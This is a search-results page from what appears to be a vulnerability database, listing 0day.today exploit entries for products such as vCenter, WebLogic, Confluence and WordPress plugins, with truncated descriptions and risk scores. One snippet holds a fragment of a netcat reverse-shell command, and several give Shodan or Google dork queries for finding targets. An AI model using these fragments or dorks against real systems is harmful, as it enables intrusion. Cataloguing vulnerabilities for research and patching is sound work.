Lucene search
K
ZdtMost viewed

39001 matches found

0day.today
0day.today
added 2021/10/07 12:0 a.m.585 views

VMware vCenter Server Analytics (CEIP) Service File Upload Exploit

This Metasploit module exploits a file upload in VMware vCenter Server's analytics/telemetry CEIP service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default. This module...

9.8CVSS9.1AI score0.99999EPSS
Exploits11
0day.today
0day.today
added 2015/11/14 12:0 a.m.585 views

b374k 3.2.3 2.8 CSRF / Command Injection Vulnerabilities

b374k web shell versions 2.8 and 3.2.3 suffer from a cross site request forgery vulnerability that allows for remote command injection. Vendor: ============================================ github.com/b374k/b374k code.google.com/p/b374k-shell/downloads/list code.google.com/archive/p/b374k-shell/...

7.6AI score
Exploits0
0day.today
0day.today
added 2023/06/12 12:0 a.m.584 views

Oracle Weblogic PreAuth Remote Command Execution Exploit

Oracle Weblogic versions 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 prior to the Jan 2023 security update are vulnerable to an unauthenticated remote code execution vulnerability due to a post deserialization vulnerability. This Metasploit module exploits this vulnerability to trigger the JNDI...

7.5CVSS8AI score0.99811EPSS
Exploits10
0day.today
0day.today
added 2023/02/21 12:0 a.m.584 views

pfBlockerNG 2.1.4_26 - Remote Code Execution Exploit

Exploit Title: pfBlockerNG 2.1.426 - Remote Code Execution RCE Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22 Date: 5th of September 2022 Exploit Author: IHTeam Vendor Homepage:...

9.8CVSS9.2AI score0.87247EPSS
Exploits14
0day.today
0day.today
added 2021/11/18 12:0 a.m.583 views

WordPress Preview E-mails For WooCommerce 1.6.8 Cross Site Scripting Vulnerability

WordPress Preview E-mails for WooCommerce plugin versions 1.6.8 and below suffer from a cross site scripting vulnerability. Description: Reflected Cross-Site Scripting Affected Plugin: Preview E-mails for WooCommerce Plugin Slug: woo-preview-emails Affected Versions: = 1.6.8 CVE ID: CVE-2021-4236...

6.1CVSS6.3AI score0.01131EPSS
Exploits3
0day.today
0day.today
added 2022/09/29 12:0 a.m.582 views

qdPM 9.1 Authenticated Shell Upload Exploit

A remote code execution vulnerability exists in qdPM versions 9.1 and below. An attacker can upload a malicious PHP code file via the profile photo functionality by leveraging a path traversal vulnerability in the users'photoppreview' delete photo feature thus allowing bypass of .htaccess...

8.8CVSS9.2AI score0.83235EPSS
Exploits18
0day.today
0day.today
added 2014/07/06 12:0 a.m.582 views

BoltWire 4.10 Arbitrary File Upload Vulnerability

Exploit for php platform in category web applications Vulnerability in BoltWire, which can be exploited to execute arbitrary PHP code on the target system and gain complete control over vulnerable web application. 1 Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169 The...

4.4CVSS6.6AI score
Exploits1
0day.today
0day.today
added 2025/01/23 12:0 a.m.582 views

MacOS CoreAudio Framework Sandbox Escape Exploit

MacOS suffers from a sandbox escape vulnerability due to a type confusion issue in coreaudiod/CoreAudio Framework. The com.apple.audio.audiohald Mach service on MacOS is hosted by the coreaudiod process. This process exposes the Hardware Abstraction Layer HAL of the CoreAudio framework, which...

7.8CVSS7.3AI score0.00333EPSS
Exploits2
0day.today
0day.today
added 2020/02/22 12:0 a.m.581 views

OpenNetAdmin Ping Command Injection Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OpenNetAdmin Ping Command Injection', 'Description' = %q This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1. ,...

0.5AI score
Exploits0
0day.today
0day.today
added 2024/03/06 12:0 a.m.580 views

Artica Proxy 4.50 Loopback Service Disclosure Vulnerability

Services that are running and bound to the loopback interface on the Artica Proxy version 4.50 are accessible through the proxy service. In particular, the tailon service is running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Using the tailon service,...

9.8CVSS7.1AI score0.16711EPSS
Exploits3
0day.today
0day.today
added 2022/10/21 12:0 a.m.580 views

Zimbra Collaboration Suite TAR Path Traversal Exploit

This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility th...

9.8CVSS8AI score0.95478EPSS
Exploits8
0day.today
0day.today
added 2020/06/12 12:0 a.m.580 views

Background Intelligent Transfer Service Privilege Escalation Exploit

This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service BITS, to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code executio...

9CVSS0.5AI score0.99965EPSS
Exploits33
0day.today
0day.today
added 2024/03/06 12:0 a.m.579 views

Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation Vulnerability

The Rich Filemanager feature of Artica Proxy versions 4.40 and 4.50 provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. This provides an unauthenticated attacker complete access to...

9.8CVSS7.5AI score0.00933EPSS
Exploits3
0day.today
0day.today
added 2020/07/27 12:0 a.m.578 views

Calavera UpLoader 3.5 - (FTP Logi) Denial of Service (PoC + SEH Overwrite) Exploit

Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service PoC + SEH Overwrite Author: Felipe Winsnes Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe Version: 3.5 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Sadly enough, this...

7.4AI score
Exploits0
0day.today
0day.today
added 2021/10/29 12:0 a.m.576 views

WebCTRL OEM 6.5 - (locale) Reflected Cross-Site Scripting Vulnerability

Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting XSS Exploit Author: 3ndG4me Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/ Version: 6.5 and Below CVE : CVE-2021-31682 --Summary-- The login portal for the Automated Logic...

6.1CVSS0.2AI score0.10509EPSS
Exploits4
0day.today
0day.today
added 2022/09/14 12:0 a.m.574 views

TIBCO JasperReports Server 8.0.2 Community Edition Code Execution Vulnerability

Due to JMX/RMI services in TIBCO JasperReports Server version 8.0.2 Community Edition performing unsafe deserialization, it is possible to execute arbitrary code and system commands on the server system. Product: JasperReports Server Manufacturer: TIBCO Software Inc. Tested Versions: 8.0.2...

8.4AI score
Exploits0
0day.today
0day.today
added 2021/10/31 12:0 a.m.574 views

WordPress NextScripts: Social Networks Auto-Poster 4.3.20 XSS Vulnerability

WordPress NextScripts: Social Networks Auto-Poster plugin versions 4.3.20 and below suffer from a cross site scripting vulnerability. Description: Reflected Cross-Site ScriptingXSS Affected Plugin: NextScripts: Social Networks Auto-Poster Plugin Slug: social-networks-auto-poster-facebook-twitter-...

6.1CVSS6.2AI score0.00845EPSS
Exploits3
0day.today
0day.today
added 2021/07/07 12:0 a.m.574 views

MikroTik RouterOS 6.x Reachable Assertion Failure / Null Pointer Dereference Vulnerabilities

MikroTik RouterOS version 6.x suffers from having multiple null pointer dereference vulnerabilities and a reachable assertion failure MikroTik RouterOS 6.x Reachable Assertion Failure / Null Pointer Dereference Details ======= Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor...

7.2AI score
Exploits0
0day.today
0day.today
added 2016/09/28 12:0 a.m.572 views

FreePBX < 13.0.188 - Remote Command Execution (Metasploit) Exploit

Exploit for php platform in category remote exploits Title : Freepbx =begin Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking Technical details...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/11/12 12:0 a.m.569 views

Php travel agency system 1.0 by oretnom23 Multiple SQL injection Vulnerabilities

Title: travel-1.0-by-oretnom23 Multiple-SQLi Author: nu11secur1ty Vendor: https://github.com/oretnom23 Software: https://github.com/oretnom23/php-travel-agency-system Reference: https://portswigger.net/web-security/sql-injection Description: The search parameter appears to be vulnerable to SQL...

7.4AI score
Exploits0
0day.today
0day.today
added 2020/07/19 12:0 a.m.569 views

PMB 5.6 Cross Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: PMB 5.6 Cross Site Scripting XSS Google Dork: inurl:opaccss Exploit Author: 41-trk Tarik Bakir Email: tarikbak999atgmail.com Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files...

0.1AI score
Exploits0
0day.today
0day.today
added 2019/12/09 12:0 a.m.570 views

Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack Exploit

// Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 85724947 = 00000000051c0f13 const XulsAutomationPrefIsSet = 0x051c0f13...

10CVSS0.3AI score0.55874EPSS
Exploits15
0day.today
0day.today
added 2018/06/20 12:0 a.m.569 views

Apache CouchDB < 2.1.0 - Remote Code Execution Exploit

Exploit for linux platform in category web applications Title: Apache CouchDB 2.1.0 - Remote Code Execution Author: Cody Zacharias Shodan Dork: port:5984 Vendor Homepage: http://couchdb.apache.org/ Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ Version: = 1.7.0 and 2.x - 2.1....

9CVSS8.4AI score0.99838EPSS
Exploits21
0day.today
0day.today
added 2024/01/24 12:0 a.m.568 views

PRTG Authenticated Remote Code Execution Exploit

class MetasploitModule 'PRTG CVE-2023-32781 Authenticated RCE', 'Description' = %q Authenticated RCE in Paessler PRTG , 'License' = MSFLICENSE, 'Author' = 'Kevin Joensen ', 'References' = 'URL', 'https://baldur.dk/blog/prtg-rce.html', 'CVE', '2023-32781' , 'DisclosureDate' = '2023-08-09',...

7.2CVSS7.1AI score0.12342EPSS
Exploits3
0day.today
0day.today
added 2020/08/18 12:0 a.m.568 views

Apache OFBiz XML-RPC Java Deserialization Exploit

This Metasploit module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for versions prior to 17.12.04. This module requires Metasploit: https://metasploit.com/download Current source:...

6.1CVSS0.6AI score0.98926EPSS
Exploits16
0day.today
0day.today
added 2021/10/26 12:0 a.m.567 views

FreeSWITCH 1.10.6 SIP Flooding Denial Of Service Exploit

FreeSWITCH susceptible to Denial of Service via SIP flooding - Fixed versions: v1.10.7 - Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-06-freeswitch-flood-dos - Vendor Security Advisory:...

8.6CVSS7.7AI score0.01598EPSS
Exploits3
0day.today
0day.today
added 2024/01/29 12:0 a.m.566 views

Atlassian Confluence SSTI Injection Exploit

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable. This module requires...

9.8CVSS7.6AI score0.99984EPSS
Exploits32
0day.today
0day.today
added 2022/08/10 12:0 a.m.565 views

Sophos XG115w Firewall 17.0.10 MR-10 Authentication Bypass Vulnerability

Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass Exploit Author: Aryan Chehreghani Vendor Homepage: https://www.sophos.com Version: 17.0.10 MR-10 Tested on: Windows 11 CVE : CVE-2022-1040 VULNERABILITY DETAILS : This vulnerability allows an attacker to gain unauthorized...

9.8CVSS0.6AI score0.99796EPSS
Exploits9
0day.today
0day.today
added 2020/04/01 12:0 a.m.565 views

TP-LINK Cloud Cameras NCXXX Remote NULL Pointer Dereference Vulnerability

Vulnerability title: TP-LINK Cloud Cameras NCXXX Remote NULL Pointer Dereference Author: Pietro Oliva CVE: CVE-2020-10231 Vendor: TP-LINK Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450 Affected version: NC200 = 2.1.8 build 171109, NC210 = 1.0.9 build 171214, NC220 = 1.3.0 build 180105,...

7.5CVSS0.2AI score0.03676EPSS
Exploits2
0day.today
0day.today
added 2020/03/23 12:0 a.m.565 views

Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)

210 bytes small WinExec add-admin dynamic null-free shellcode. // Shellcode Title: WinExec Add-Admin Dynamic Null-Free Shellcode 210 Bytes // Shellcode Author: Bobby Cooke // Date: March 21st, 2020 // Tested on: Windows 10 Home - 1909 x8664, Windows 10 Pro - 1909 x86 // Description: Windows...

7.1AI score
Exploits0
0day.today
0day.today
added 2025/01/08 12:0 a.m.564 views

Selenium Chrome Remote Code Execution Exploit

Selenium Server Grid versions prior to 4.0.0-alpha-7 allows cross site request forgery because it permits non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain and this issue in turn allows for an attacker to achieve remote code execution. This modu...

8.8CVSS9AI score0.11675EPSS
Exploits6
0day.today
0day.today
added 2023/12/18 12:0 a.m.564 views

PKP-WAL 3.4.0-3 Remote Code Execution Exploit

PKP Web Application Library PKP-WAL versions 3.4.0-3 and below, as used in Open Journal Systems OJS, Open Monograph Press OMP, and Open Preprint Systems OPS before versions 3.4.0-4 or 3.3.0-16, suffer from a NativeImportExportPlugin related remote code execution vulnerability...

5.3CVSS8.2AI score0.00618EPSS
Exploits2
0day.today
0day.today
added 2006/08/22 12:0 a.m.564 views

Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit

Exploit for unknown platform in category web applications =========================================================== Simple Machines Forum = 1.1 rc2 Lock Topics Remote Exploit =========================================================== !/usr/bin/php -q -d shortopentag=on ? printr'...

7.1AI score
Exploits0
0day.today
0day.today
added 2021/11/07 12:0 a.m.563 views

Pentaho Business Analytics / Pentaho Business Server 9.1 SQL Injection Vulnerability

Pentaho allows users to create and manage Data Sources. Users can select a Data Source when creating a Dashboard through the Pentaho User Console. When a Data Source is added, Pentaho makes a HTTP request to the dashboards editor /pentaho/api/repos/dashboards/editor in order to test the connectio...

9.8CVSS9.1AI score0.51653EPSS
Exploits6
0day.today
0day.today
added 2020/05/07 12:0 a.m.563 views

Kentico CMS 12.0.14 Remote Command Execution Exploit

This Metasploit module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier. Remote command execution is possible via unauthenticated XML requests to the Staging Service SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML inp...

9.8CVSS1.1AI score0.96031EPSS
Exploits5
0day.today
0day.today
added 2022/04/14 12:0 a.m.562 views

WordPress Elementor 3.6.2 Remote Code Execution Vulnerability

Description: Insufficient Access Control leading to Subscriber+ Remote Code Execution Affected Plugin: Elementor Plugin Slug: elementor Plugin Developer: Elementor Affected Versions: 3.6.0 – 3.6.2 CVE ID: CVE-2022-1329 CVSS Score: 9.9Critical CVSS Vector:...

8.8CVSS0.4AI score0.92658EPSS
Exploits10
0day.today
0day.today
added 2019/12/23 12:0 a.m.562 views

FreeSWITCH 1.10.1 - Command Execution Exploit

Exploit Title: FreeSWITCH 1.10.1 - Command Execution Exploit Author: 1F98D Vendor Homepage: https://freeswitch.com/ Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi Version: 1.10.1 Tested on: Windows 10 x64 FreeSWITCH listens on port 8021 by...

7.4AI score
Exploits0
0day.today
0day.today
added 2014/10/29 12:0 a.m.562 views

CUPS Filter Bash Environment Variable Code Injection Exploit

This Metasploit module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTERINFO and PRINTERLOCATION variables by default. This module requires Metasploit: http://metasploit.com/download Current source:...

10CVSS0.6AI score0.99999EPSS
Exploits148
0day.today
0day.today
added 2023/12/22 12:0 a.m.561 views

Craft CMS 4.4.14 Remote Code Execution Exploit

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Craft CMS versions 4.0.0-RC1 through 4.4.14. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Craft CMS...

10CVSS8AI score0.92918EPSS
Exploits10
0day.today
0day.today
added 2023/11/30 12:0 a.m.561 views

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

7.5CVSS7.4AI score0.00512EPSS
Exploits4
0day.today
0day.today
added 2023/06/12 12:0 a.m.561 views

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution Exploit

This Metasploit module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange IKE packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are as follows: ATP Firmware version 4.60 to 5.35 inclusive, USG FLEX...

9.8CVSS7.9AI score0.99284EPSS
Exploits8
0day.today
0day.today
added 2021/12/09 12:0 a.m.560 views

Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Exploit

Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Exploit Author: s1gh Vendor Homepage: https://grafana.com/ Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p Version: V8.0.0-beta1 through V8.3.0 Description: Grafana version...

7.5CVSS0.3AI score0.88849EPSS
Exploits44
0day.today
0day.today
added 2021/11/23 12:0 a.m.560 views

GNU gdbserver 9.2 - Remote Command Execution Exploit

Exploit Title: GNU gdbserver 9.2 - Remote Command Execution RCE Exploit Author: Roberto Gesteira Miñarro 7Rocky Vendor Homepage: https://www.gnu.org/software/gdb/ Software Link: https://www.gnu.org/software/gdb/download/ Version: GNU gdbserver Ubuntu 9.2-0ubuntu120.04 9.2 Tested on: Ubuntu Linux...

7.4AI score
Exploits0
0day.today
0day.today
added 2021/10/29 12:0 a.m.560 views

Umbraco v8.14.1 - (baseUrl) SSRF Vulnerability

Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF Exploit Author: NgoAnhDuc Vendor Homepage: https://our.umbraco.com/ Software Link: https://our.umbraco.com/download/releases/8141 Version: v8.14.1 Affect: Umbraco CMS v8.14.1, Umbraco Cloud Vulnerable code:...

Exploits0
0day.today
0day.today
added 2024/04/12 12:0 a.m.559 views

WBCE 1.6.0 - Unauthenticated SQL injection Vulnerability

Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0 Exploit Author: young pope Vendor Homepage: https://github.com/WBCE/WBCECMS Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.0.zip Version: 1.6.0 Tested on: Kali linux CVE : CVE-2023-39796 There is an sql injection...

9.8CVSS9.6AI score0.06096EPSS
Exploits3
0day.today
0day.today
added 2020/07/22 12:0 a.m.559 views

Sophos VPN Web Panel 2020 - Denial of Service Exploit

Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service Poc Exploit Author: Berk KIRAS Vendor Homepage: https://www.sophos.com/ Version:2020 Web Panel Tested on: Apache Berk KIRAS PwC - Cyber Security Specialist Sophos VPN Web Portal Denial of Service Vulnerability System parse JSON data. If...

0.2AI score
Exploits0
0day.today
0day.today
added 2023/08/16 12:0 a.m.558 views

H2 Database Web Interface Create Alias Remote Code Execution Exploit

The H2 database contains an alias function which allows for arbitrary Java code to be used. This functionality can be abused to create an exec functionality to pull our payload down and execute it. H2's web interface contains restricts MANY characters, so injecting a payload directly is not...

7.4AI score
Exploits0
0day.today
0day.today
added 2021/10/22 12:0 a.m.558 views

Jetty 9.4.37.v20210219 - Information Disclosure Vulnerability

Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure Exploit Author: Mayank Deshmukh Vendor Homepage: https://www.eclipse.org/jetty/ Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ Version: 9.4.37.v20210219 and 9.4.38.v20210224 Tested...

5.3CVSS6.6AI score0.82371EPSS
Exploits7
0day.today
0day.today
added 2022/03/01 12:0 a.m.557 views

Hospital Patient Record Management System v1.0 Multiple SQL injection Vulnerability

Title: Hospital Patient Record Management System v1.0 Multiple SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Reference:...

9.8CVSS0.4AI score0.01613EPSS
Exploits2
0day.today
0day.today
added 2025/01/02 12:0 a.m.556 views

WordPress Radio Player 2.0.82 Server-Side Request Forgery Vulnerability

CVE-2024-54385 Radio Player = 2.0.82 - Unauthenticated Server-Side Request Forgery Description The Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This...

7.2CVSS7.1AI score0.05213EPSS
Exploits1
Total number of security vulnerabilities5000